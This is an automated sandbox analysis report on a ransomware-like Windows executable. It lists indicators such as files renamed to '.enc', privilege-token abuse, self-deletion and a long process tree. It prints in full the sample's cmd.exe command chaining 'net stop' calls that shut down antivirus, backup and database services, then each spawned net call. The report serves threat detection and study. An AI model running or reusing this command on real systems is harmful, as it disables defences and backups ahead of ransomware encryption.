2b9949889dd265aa85dd7712d7b8344832dcb6ee03574aab23cee91ff68557de.exe

General
Target

2b9949889dd265aa85dd7712d7b8344832dcb6ee03574aab23cee91ff68557de.exe

Filesize

53KB

Completed

20-10-2021 00:11

Score
8/10
MD5

075fde76356266570e4801a1f0e852ae

SHA1

c6fa790f37e0a30b1c6cc9014fefc9164adc8a16

SHA256

2b9949889dd265aa85dd7712d7b8344832dcb6ee03574aab23cee91ff68557de

Malware Config
Signatures 7

Filter: none

Discovery
  • Modifies extensions of user files
    2b9949889dd265aa85dd7712d7b8344832dcb6ee03574aab23cee91ff68557de.exe

    Description

    Ransomware generally changes the extension on encrypted files.

    Tags

    Reported IOCs

    descriptioniocprocess
    File renamedC:\Users\Admin\Pictures\UnlockUninstall.png => C:\Users\Admin\Pictures\UnlockUninstall.png.enc2b9949889dd265aa85dd7712d7b8344832dcb6ee03574aab23cee91ff68557de.exe
    File renamedC:\Users\Admin\Pictures\UpdateNew.raw => C:\Users\Admin\Pictures\UpdateNew.raw.enc2b9949889dd265aa85dd7712d7b8344832dcb6ee03574aab23cee91ff68557de.exe
    File opened for modificationC:\Users\Admin\Pictures\WaitFormat.tiff2b9949889dd265aa85dd7712d7b8344832dcb6ee03574aab23cee91ff68557de.exe
    File renamedC:\Users\Admin\Pictures\WaitFormat.tiff => C:\Users\Admin\Pictures\WaitFormat.tiff.enc2b9949889dd265aa85dd7712d7b8344832dcb6ee03574aab23cee91ff68557de.exe
    File renamedC:\Users\Admin\Pictures\HideStop.tif => C:\Users\Admin\Pictures\HideStop.tif.enc2b9949889dd265aa85dd7712d7b8344832dcb6ee03574aab23cee91ff68557de.exe
    File renamedC:\Users\Admin\Pictures\RedoGroup.png => C:\Users\Admin\Pictures\RedoGroup.png.enc2b9949889dd265aa85dd7712d7b8344832dcb6ee03574aab23cee91ff68557de.exe
    File renamedC:\Users\Admin\Pictures\StartProtect.tif => C:\Users\Admin\Pictures\StartProtect.tif.enc2b9949889dd265aa85dd7712d7b8344832dcb6ee03574aab23cee91ff68557de.exe
  • Deletes itself
    cmd.exe

    Reported IOCs

    pidprocess
    1064cmd.exe
  • Kills process with taskkill
    taskkill.exe

    Tags

    Reported IOCs

    pidprocess
    1612taskkill.exe
  • Runs net.exe
  • Runs ping.exe
    PING.EXE

    TTPs

    Remote System Discovery

    Reported IOCs

    pidprocess
    824PING.EXE
  • Suspicious use of AdjustPrivilegeToken
    2b9949889dd265aa85dd7712d7b8344832dcb6ee03574aab23cee91ff68557de.exetaskkill.exe

    Reported IOCs

    descriptionpidprocess
    Token: SeDebugPrivilege14402b9949889dd265aa85dd7712d7b8344832dcb6ee03574aab23cee91ff68557de.exe
    Token: SeDebugPrivilege14402b9949889dd265aa85dd7712d7b8344832dcb6ee03574aab23cee91ff68557de.exe
    Token: SeDebugPrivilege1612taskkill.exe
  • Suspicious use of WriteProcessMemory
    2b9949889dd265aa85dd7712d7b8344832dcb6ee03574aab23cee91ff68557de.execmd.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exe

    Reported IOCs

    descriptionpidprocesstarget process
    PID 1440 wrote to memory of 168014402b9949889dd265aa85dd7712d7b8344832dcb6ee03574aab23cee91ff68557de.execmd.exe
    PID 1440 wrote to memory of 168014402b9949889dd265aa85dd7712d7b8344832dcb6ee03574aab23cee91ff68557de.execmd.exe
    PID 1440 wrote to memory of 168014402b9949889dd265aa85dd7712d7b8344832dcb6ee03574aab23cee91ff68557de.execmd.exe
    PID 1680 wrote to memory of 11281680cmd.exenet.exe
    PID 1680 wrote to memory of 11281680cmd.exenet.exe
    PID 1680 wrote to memory of 11281680cmd.exenet.exe
    PID 1128 wrote to memory of 5201128net.exenet1.exe
    PID 1128 wrote to memory of 5201128net.exenet1.exe
    PID 1128 wrote to memory of 5201128net.exenet1.exe
    PID 1680 wrote to memory of 6601680cmd.exenet.exe
    PID 1680 wrote to memory of 6601680cmd.exenet.exe
    PID 1680 wrote to memory of 6601680cmd.exenet.exe
    PID 660 wrote to memory of 756660net.exenet1.exe
    PID 660 wrote to memory of 756660net.exenet1.exe
    PID 660 wrote to memory of 756660net.exenet1.exe
    PID 1680 wrote to memory of 6881680cmd.exenet.exe
    PID 1680 wrote to memory of 6881680cmd.exenet.exe
    PID 1680 wrote to memory of 6881680cmd.exenet.exe
    PID 688 wrote to memory of 288688net.exenet1.exe
    PID 688 wrote to memory of 288688net.exenet1.exe
    PID 688 wrote to memory of 288688net.exenet1.exe
    PID 1680 wrote to memory of 5681680cmd.exenet.exe
    PID 1680 wrote to memory of 5681680cmd.exenet.exe
    PID 1680 wrote to memory of 5681680cmd.exenet.exe
    PID 568 wrote to memory of 1472568net.exenet1.exe
    PID 568 wrote to memory of 1472568net.exenet1.exe
    PID 568 wrote to memory of 1472568net.exenet1.exe
    PID 1680 wrote to memory of 16881680cmd.exenet.exe
    PID 1680 wrote to memory of 16881680cmd.exenet.exe
    PID 1680 wrote to memory of 16881680cmd.exenet.exe
    PID 1688 wrote to memory of 14121688net.exenet1.exe
    PID 1688 wrote to memory of 14121688net.exenet1.exe
    PID 1688 wrote to memory of 14121688net.exenet1.exe
    PID 1680 wrote to memory of 11841680cmd.exenet.exe
    PID 1680 wrote to memory of 11841680cmd.exenet.exe
    PID 1680 wrote to memory of 11841680cmd.exenet.exe
    PID 1184 wrote to memory of 5121184net.exenet1.exe
    PID 1184 wrote to memory of 5121184net.exenet1.exe
    PID 1184 wrote to memory of 5121184net.exenet1.exe
    PID 1680 wrote to memory of 15361680cmd.exenet.exe
    PID 1680 wrote to memory of 15361680cmd.exenet.exe
    PID 1680 wrote to memory of 15361680cmd.exenet.exe
    PID 1536 wrote to memory of 6761536net.exenet1.exe
    PID 1536 wrote to memory of 6761536net.exenet1.exe
    PID 1536 wrote to memory of 6761536net.exenet1.exe
    PID 1680 wrote to memory of 10361680cmd.exenet.exe
    PID 1680 wrote to memory of 10361680cmd.exenet.exe
    PID 1680 wrote to memory of 10361680cmd.exenet.exe
    PID 1036 wrote to memory of 15721036net.exenet1.exe
    PID 1036 wrote to memory of 15721036net.exenet1.exe
    PID 1036 wrote to memory of 15721036net.exenet1.exe
    PID 1680 wrote to memory of 8241680cmd.exenet.exe
    PID 1680 wrote to memory of 8241680cmd.exenet.exe
    PID 1680 wrote to memory of 8241680cmd.exenet.exe
    PID 824 wrote to memory of 1624824net.exenet1.exe
    PID 824 wrote to memory of 1624824net.exenet1.exe
    PID 824 wrote to memory of 1624824net.exenet1.exe
    PID 1680 wrote to memory of 17001680cmd.exenet.exe
    PID 1680 wrote to memory of 17001680cmd.exenet.exe
    PID 1680 wrote to memory of 17001680cmd.exenet.exe
    PID 1700 wrote to memory of 10641700net.exenet1.exe
    PID 1700 wrote to memory of 10641700net.exenet1.exe
    PID 1700 wrote to memory of 10641700net.exenet1.exe
    PID 1680 wrote to memory of 8281680cmd.exenet.exe
Processes 372
  • C:\Users\Admin\AppData\Local\Temp\2b9949889dd265aa85dd7712d7b8344832dcb6ee03574aab23cee91ff68557de.exe
    "C:\Users\Admin\AppData\Local\Temp\2b9949889dd265aa85dd7712d7b8344832dcb6ee03574aab23cee91ff68557de.exe"
    Modifies extensions of user files
    Suspicious use of AdjustPrivilegeToken
    Suspicious use of WriteProcessMemory
    PID:1440
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c net stop Acronis VSS Provider /y & net stop Enterprise Client Service /y & net stop Sophos Agent /y & net stop Sophos AutoUpdate Service /y & net stop Sophos Clean Service /y & net stop Sophos Device Control Service /y & net stop Sophos File Scanner Service /y & net stop Sophos Health Service /y & net stop Sophos MCS Agent /y & net stop Sophos MCS Client /y & net stop Sophos Message Router /y & net stop Sophos SafeStore Service /y & net stop Sophos Protection System Service /y & net stop Sophos Web Control Service /y & net stop SQLsafe ?????????? ??????????? ?????? /y & net stop SQLsafe Filter Service /y & net stop Symantec System Recovery /y & net stop Veeam Backup Service Data Catalog /y & net stop AcronisAgent /y & net stop AcrSch2Svc /y & net stop Antivirus /y & net stop ARSM /y & net stop BackupExecAgentAccelerator /y & net stop BackupExecAgentBrowser /y & net stop BackupExecDeviceMediaService /y & net stop BackupExecJobEngine /y & net stop BackupExecManagementService /y & net stop BackupExecRPCService /y & net stop BackupExecVSSProvider /y & net stop bedbg /y & net stop DCAgent /y & net stop EPSecurityService /y & net stop EPUpdateService /y & net stop EraserSvc11710 /y & net stop EsgShKernel /y & net stop FA_Scheduler /y & net stop IISAdmin /y & net stop IMAP4Svc /y & net stop macmnsvc /y & net stop masvc /y & net stop MBAMService /y & net stop MBEndpointAgent /y & net stop McAfeeEngineService /y & net stop McAfeeFramework /y & net stop McAfeeFrameworkMcAfeeFramework /y & net stop McShield /y & net stop McTaskManager /y & net stop mfemms /y & net stop mfevtp /y & net stop MMS /y & net stop mozyprobackup /y & net stop MsDtsServer /y & net stop MsDtsServer100 /y & net stop MsDtsServer110 /y & net stop MSExchangeES /y & net stop MSExchangeIS /y & net stop MSExchangeMGMT /y & net stop MSExchangeMTA /y & net stop MSExchangeSA /y & net stop MSExchangeSRS /y & net stop MSOLAP $ SQL_2008 /y & net stop MSOLAP $ SYSTEM_BGC /y & net stop MSOLAP $ TPS /y & net stop MSOLAP $ TPSAMA /y & net stop MSSQL $ BKUPEXEC /y & net stop MSSQL $ ECWDB2 /y & net stop MSSQL $ PRACTICEMGT /y & net stop MSSQL $ PRACTTICEBGC /y & net stop MSSQL $ PROFXENGAGEMENT /y & net stop MSSQL $ SBSMONITORING /y & net stop MSSQL $ SHAREPOINT /y & net stop MSSQL $ SQL_2008 /y & net stop MSSQL $ SYSTEM_BGC /y & net stop MSSQL $ TPS /y & net stop MSSQL $ TPSAMA /y & net stop MSSQL $ VEEAMSQL2008R2 /y & net stop MSSQL $ VEEAMSQL2012 /y & net stop MSSQLFDLauncher /y & net stop MSSQLFDLauncher $ PROFXENGAGEMENT /y & net stop MSSQLFDLauncher $ SBSMONITORING /y & net stop MSSQLFDLauncher $ SHAREPOINT /y & net stop MSSQLFDLauncher $ SQL_2008 /y & net stop MSSQLFDLauncher $ SYSTEM_BGC /y & net stop MSSQLFDLauncher $ TPS /y & net stop MSSQLFDLauncher $ TPSAMA /y & net stop MSSQLSERVER /y & net stop MSSQLServerADHelper100 /y & net stop MSSQLServerOLAPService /y & net stop MySQL80 /y & net stop MySQL57 /y & net stop ntrtscan /y & net stop OracleClientCache80 /y & net stop PDVFSService /y & net stop POP3SVC /y & net stop ReportServer /y & net stop ReportServer $ SQL_2008 /y & net stop ReportServer $ SYSTEM_BGC /y & net stop ReportServer $ TPS /y & net stop ReportServer $ TPSAMA /y & net stop RESVC /y & net stop sacsvr /y & net stop SamSs /y & net stop SAVAdminService /y & net stop ????????? /y & net stop SDRSVC /y & net stop SepMasterService /y & net stop ShMonitor /y & net stop Smcinst /y & net stop SmcService /y & net stop SMTPSVC /y & net stop SNAC /y & net stop SntpService /y & net stop sophossps /y & net stop SQLAgent $ BKUPEXEC /y & net stop SQLAgent $ ECWDB2 /y & net stop SQLAgent $ PRACTTICEBGC /y & net stop SQLAgent $ PRACTTICEMGT /y & net stop SQLAgent $ PROFXENGAGEMENT /y & net stop SQLAgent $ SBSMONITORING /y & net stop SQLAgent $ SHAREPOINT /y & net stop SQLAgent $ SQL_2008 /y & net stop SQLAgent $ SYSTEM_BGC /y & net stop SQLAgent $ TPS /y & net stop SQLAgent $ TPSAMA /y & net stop SQLAgent $ VEEAMSQL2008R2 /y & net stop SQLAgent $ VEEAMSQL2012 /y & net stop SQLBrowser /y & net stop SQLSafeOLRService /y & net stop SQLSERVERAGENT /y & net stop SQLTELEMETRY /y & net stop SQLTELEMETRY $ ECWDB2 /y & net stop SQLWriter /y & net stop SstpSvc /y & net stop svcGenericHost /y & net stop swi_filter /y & net stop swi_service /y & net stop swi_update_64 /y & net stop TmCCSF /y & net stop tmlisten /y & net stop TrueKey /y & net stop TrueKeyScheduler /y & net stop TrueKeyServiceHelper /y & net stop UI0Detect /y & net stop VeeamBackupSvc /y & net stop VeeamBrokerSvc /y & net stop VeeamCatalogSvc /y & net stop VeeamCloudSvc /y & net stop VeeamDeploymentService /y & net stop VeeamDeploySvc /y & net stop VeeamEnterpriseManagerSvc /y & net stop VeeamMountSvc /y & net stop VeeamNFSSvc /y & net stop VeeamRESTSvc /y & net stop VeeamTransportSvc /y & net stop W3svc /y & net stop wbengine /y & net stop WRSVC /y & net stop MSSQL $ VEEAMSQL2008R2 /y & net stop SQLAgent $ VEEAMSQL2008R2 /y & net stop VeeamHvIntegrationSvc /y & net stop swi_update /y & net stop SQLAgent $ CXDB /y & net stop SQLAgent $ CITRIX_METAFRAME /y & net stop SQL ???????? /y & net stop MSSQL $ PROD /y & net stop Zoolz 2 ?????? /y & net stop MSSQLServerADHelper /y & net stop SQLAgent $ PROD /y & net stop msftesql $ PROD /y & net stop NetMsmqActivator /y & net stop EhttpSrv /y & net stop ekrn /y & net stop ESHASRV /y & net stop MSSQL $ SOPHOS /y & net stop SQLAgent $ SOPHOS /y & net stop AVP /y & net stop klnagent /y & net stop MSSQL $ SQLEXPRESS /y & net stop SQLAgent $ /y & net stop SQLEXPRESS /y & net stop wbengine /y & net stop kavfsslp /y & net stop KAVFSGT /y
      Suspicious use of WriteProcessMemory
      PID:1680
      • C:\Windows\system32\net.exe
        net stop Acronis VSS Provider /y
        Suspicious use of WriteProcessMemory
        PID:1128
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop Acronis VSS Provider /y
          PID:520
      • C:\Windows\system32\net.exe
        net stop Enterprise Client Service /y
        Suspicious use of WriteProcessMemory
        PID:660
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop Enterprise Client Service /y
          PID:756
      • C:\Windows\system32\net.exe
        net stop Sophos Agent /y
        Suspicious use of WriteProcessMemory
        PID:688
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop Sophos Agent /y
          PID:288
      • C:\Windows\system32\net.exe
        net stop Sophos AutoUpdate Service /y
        Suspicious use of WriteProcessMemory
        PID:568
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop Sophos AutoUpdate Service /y
          PID:1472
      • C:\Windows\system32\net.exe
        net stop Sophos Clean Service /y
        Suspicious use of WriteProcessMemory
        PID:1688
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop Sophos Clean Service /y
          PID:1412
      • C:\Windows\system32\net.exe
        net stop Sophos Device Control Service /y
        Suspicious use of WriteProcessMemory
        PID:1184
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop Sophos Device Control Service /y
          PID:512
      • C:\Windows\system32\net.exe
        net stop Sophos File Scanner Service /y
        Suspicious use of WriteProcessMemory
        PID:1536
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop Sophos File Scanner Service /y
          PID:676
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop BackupExecManagementService /y
          PID:420
      • C:\Windows\system32\net.exe
        net stop Sophos Health Service /y
        Suspicious use of WriteProcessMemory
        PID:1036
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop Sophos Health Service /y
          PID:1572
      • C:\Windows\system32\net.exe
        net stop Sophos MCS Agent /y
        Suspicious use of WriteProcessMemory
        PID:824
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop Sophos MCS Agent /y
          PID:1624
      • C:\Windows\system32\net.exe
        net stop Sophos MCS Client /y
        Suspicious use of WriteProcessMemory
        PID:1700
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop Sophos MCS Client /y
          PID:1064
      • C:\Windows\system32\net.exe
        net stop Sophos Message Router /y
        PID:828
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop Sophos Message Router /y
          PID:1824
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop DCAgent /y
          PID:1524
      • C:\Windows\system32\net.exe
        net stop Sophos SafeStore Service /y
        PID:1560
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop Sophos SafeStore Service /y
          PID:1916
      • C:\Windows\system32\net.exe
        net stop Sophos Protection System Service /y
        PID:852
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop Sophos Protection System Service /y
          PID:1712
      • C:\Windows\system32\net.exe
        net stop Sophos Web Control Service /y
        PID:1912
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop Sophos Web Control Service /y
          PID:856
      • C:\Windows\system32\net.exe
        net stop SQLsafe ?????????? ??????????? ?????? /y
        PID:996
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop SQLsafe ?????????? ??????????? ?????? /y
          PID:1984
      • C:\Windows\system32\net.exe
        net stop SQLsafe Filter Service /y
        PID:916
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop SQLsafe Filter Service /y
          PID:1148
      • C:\Windows\system32\net.exe
        net stop Symantec System Recovery /y
        PID:1144
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop Symantec System Recovery /y
          PID:1760
      • C:\Windows\system32\net.exe
        net stop Veeam Backup Service Data Catalog /y
        PID:1508
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop Veeam Backup Service Data Catalog /y
          PID:1616
      • C:\Windows\system32\net.exe
        net stop AcronisAgent /y
        PID:1612
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop AcronisAgent /y
          PID:2028
      • C:\Windows\system32\net.exe
        net stop AcrSch2Svc /y
        PID:1728
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop AcrSch2Svc /y
          PID:576
      • C:\Windows\system32\net.exe
        net stop Antivirus /y
        PID:1128
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop Antivirus /y
          PID:1060
      • C:\Windows\system32\net.exe
        net stop ARSM /y
        PID:660
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop ARSM /y
          PID:1288
      • C:\Windows\system32\net.exe
        net stop BackupExecAgentAccelerator /y
        PID:688
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
          PID:1244
      • C:\Windows\system32\net.exe
        net stop BackupExecAgentBrowser /y
        PID:568
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
          PID:1404
      • C:\Windows\system32\net.exe
        net stop BackupExecDeviceMediaService /y
        PID:1688
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
          PID:1564
      • C:\Windows\system32\net.exe
        net stop BackupExecJobEngine /y
        PID:1184
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop BackupExecJobEngine /y
          PID:1840
      • C:\Windows\system32\net.exe
        net stop BackupExecManagementService /y
        PID:1536
      • C:\Windows\system32\net.exe
        net stop BackupExecRPCService /y
        PID:1036
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop BackupExecRPCService /y
          PID:1088
      • C:\Windows\system32\net.exe
        net stop BackupExecVSSProvider /y
        PID:824
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop BackupExecVSSProvider /y
          PID:1092
      • C:\Windows\system32\net.exe
        net stop bedbg /y
        PID:1700
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop bedbg /y
          PID:1488
      • C:\Windows\system32\net.exe
        net stop DCAgent /y
        PID:828
      • C:\Windows\system32\net.exe
        net stop EPSecurityService /y
        PID:1560
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop EPSecurityService /y
          PID:1080
      • C:\Windows\system32\net.exe
        net stop EPUpdateService /y
        PID:1576
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop EPUpdateService /y
          PID:1908
      • C:\Windows\system32\net.exe
        net stop EraserSvc11710 /y
        PID:1980
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop EraserSvc11710 /y
          PID:1520
      • C:\Windows\system32\net.exe
        net stop EsgShKernel /y
        PID:1068
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop EsgShKernel /y
          PID:1664
      • C:\Windows\system32\net.exe
        net stop FA_Scheduler /y
        PID:980
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop FA_Scheduler /y
          PID:1736
      • C:\Windows\system32\net.exe
        net stop IISAdmin /y
        PID:1892
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop IISAdmin /y
          PID:912
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 stop MSSQL $ ECWDB2 /y
            PID:1892
      • C:\Windows\system32\net.exe
        net stop IMAP4Svc /y
        PID:1268
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop IMAP4Svc /y
          PID:900
      • C:\Windows\system32\net.exe
        net stop macmnsvc /y
        PID:1676
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop macmnsvc /y
          PID:1620
      • C:\Windows\system32\net.exe
        net stop masvc /y
        PID:1616
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop masvc /y
          PID:1508
      • C:\Windows\system32\net.exe
        net stop MBAMService /y
        PID:1660
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop MBAMService /y
          PID:2028
      • C:\Windows\system32\net.exe
        net stop MBEndpointAgent /y
        PID:1612
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop MBEndpointAgent /y
          PID:1464
      • C:\Windows\system32\net.exe
        net stop McAfeeEngineService /y
        PID:576
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop McAfeeEngineService /y
          PID:1728
      • C:\Windows\system32\net.exe
        net stop McAfeeFramework /y
        PID:268
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop McAfeeFramework /y
          PID:1060
      • C:\Windows\system32\net.exe
        net stop McAfeeFrameworkMcAfeeFramework /y
        PID:1128
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y
          PID:1256
      • C:\Windows\system32\net.exe
        net stop McShield /y
        PID:1288
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop McShield /y
          PID:660
      • C:\Windows\system32\net.exe
        net stop McTaskManager /y
        PID:920
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop McTaskManager /y
          PID:1244
      • C:\Windows\system32\net.exe
        net stop mfemms /y
        PID:688
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop mfemms /y
          PID:1416
      • C:\Windows\system32\net.exe
        net stop mfevtp /y
        PID:1404
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop mfevtp /y
          PID:568
      • C:\Windows\system32\net.exe
        net stop MMS /y
        PID:976
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop MMS /y
          PID:1564
      • C:\Windows\system32\net.exe
        net stop mozyprobackup /y
        PID:1688
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop mozyprobackup /y
          PID:1904
      • C:\Windows\system32\net.exe
        net stop MsDtsServer /y
        PID:1840
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop MsDtsServer /y
          PID:1184
      • C:\Windows\system32\net.exe
        net stop MsDtsServer100 /y
        PID:2024
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop MsDtsServer100 /y
          PID:420
      • C:\Windows\system32\net.exe
        net stop MsDtsServer110 /y
        PID:1536
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop MsDtsServer110 /y
          PID:1692
      • C:\Windows\system32\net.exe
        net stop MSExchangeES /y
        PID:1088
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop MSExchangeES /y
          PID:1036
      • C:\Windows\system32\net.exe
        net stop MSExchangeIS /y
        PID:1704
      • C:\Windows\system32\net.exe
        net stop MSExchangeMGMT /y
        PID:824
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop MSExchangeMGMT /y
          PID:1104
      • C:\Windows\system32\net.exe
        net stop MSExchangeMTA /y
        PID:1488
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop MSExchangeMTA /y
          PID:1700
      • C:\Windows\system32\net.exe
        net stop MSExchangeSA /y
        PID:1532
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop MSExchangeSA /y
          PID:1524
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
            PID:1532
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 stop SQLAgent $ PRACTTICEMGT /y
              PID:1524
      • C:\Windows\system32\net.exe
        net stop MSExchangeSRS /y
        PID:828
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop MSExchangeSRS /y
          PID:1712
      • C:\Windows\system32\net.exe
        net stop MSOLAP $ SQL_2008 /y
        PID:1080
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop MSOLAP $ SQL_2008 /y
          PID:1560
      • C:\Windows\system32\net.exe
        net stop MSOLAP $ SYSTEM_BGC /y
        PID:1908
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop MSOLAP $ SYSTEM_BGC /y
          PID:1576
      • C:\Windows\system32\net.exe
        net stop MSOLAP $ TPS /y
        PID:1520
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop MSOLAP $ TPS /y
          PID:1980
      • C:\Windows\system32\net.exe
        net stop MSOLAP $ TPSAMA /y
        PID:1664
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop MSOLAP $ TPSAMA /y
          PID:1068
      • C:\Windows\system32\net.exe
        net stop MSSQL $ BKUPEXEC /y
        PID:1736
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop MSSQL $ BKUPEXEC /y
          PID:980
      • C:\Windows\system32\net.exe
        net stop MSSQL $ ECWDB2 /y
        PID:912
      • C:\Windows\system32\net.exe
        net stop MSSQL $ PRACTICEMGT /y
        PID:900
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop MSSQL $ PRACTICEMGT /y
          PID:1268
      • C:\Windows\system32\net.exe
        net stop MSSQL $ PRACTTICEBGC /y
        PID:1620
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop MSSQL $ PRACTTICEBGC /y
          PID:1676
      • C:\Windows\system32\net.exe
        net stop MSSQL $ PROFXENGAGEMENT /y
        PID:1508
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop MSSQL $ PROFXENGAGEMENT /y
          PID:1616
      • C:\Windows\system32\net.exe
        net stop MSSQL $ SBSMONITORING /y
        PID:2028
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop MSSQL $ SBSMONITORING /y
          PID:1660
      • C:\Windows\system32\net.exe
        net stop MSSQL $ SHAREPOINT /y
        PID:1464
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop MSSQL $ SHAREPOINT /y
          PID:1612
      • C:\Windows\system32\net.exe
        net stop MSSQL $ SQL_2008 /y
        PID:1728
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop MSSQL $ SQL_2008 /y
          PID:576
      • C:\Windows\system32\net.exe
        net stop MSSQL $ SYSTEM_BGC /y
        PID:1060
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop MSSQL $ SYSTEM_BGC /y
          PID:268
      • C:\Windows\system32\net.exe
        net stop MSSQL $ TPS /y
        PID:1256
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop MSSQL $ TPS /y
          PID:1128
      • C:\Windows\system32\net.exe
        net stop MSSQL $ TPSAMA /y
        PID:660
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop MSSQL $ TPSAMA /y
          PID:1288
      • C:\Windows\system32\net.exe
        net stop MSSQL $ VEEAMSQL2008R2 /y
        PID:1244
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop MSSQL $ VEEAMSQL2008R2 /y
          PID:920
      • C:\Windows\system32\net.exe
        net stop MSSQL $ VEEAMSQL2012 /y
        PID:1416
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop MSSQL $ VEEAMSQL2012 /y
          PID:688
      • C:\Windows\system32\net.exe
        net stop MSSQLFDLauncher /y
        PID:568
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop MSSQLFDLauncher /y
          PID:1404
      • C:\Windows\system32\net.exe
        net stop MSSQLFDLauncher $ PROFXENGAGEMENT /y
        PID:1564
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop MSSQLFDLauncher $ PROFXENGAGEMENT /y
          PID:976
      • C:\Windows\system32\net.exe
        net stop MSSQLFDLauncher $ SBSMONITORING /y
        PID:1904
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop MSSQLFDLauncher $ SBSMONITORING /y
          PID:1688
      • C:\Windows\system32\net.exe
        net stop MSSQLFDLauncher $ SHAREPOINT /y
        PID:1184
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop MSSQLFDLauncher $ SHAREPOINT /y
          PID:1840
      • C:\Windows\system32\net.exe
        net stop MSSQLFDLauncher $ SQL_2008 /y
        PID:420
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop MSSQLFDLauncher $ SQL_2008 /y
          PID:2024
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 stop SNAC /y
            PID:420
      • C:\Windows\system32\net.exe
        net stop MSSQLFDLauncher $ SYSTEM_BGC /y
        PID:1692
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop MSSQLFDLauncher $ SYSTEM_BGC /y
          PID:1536
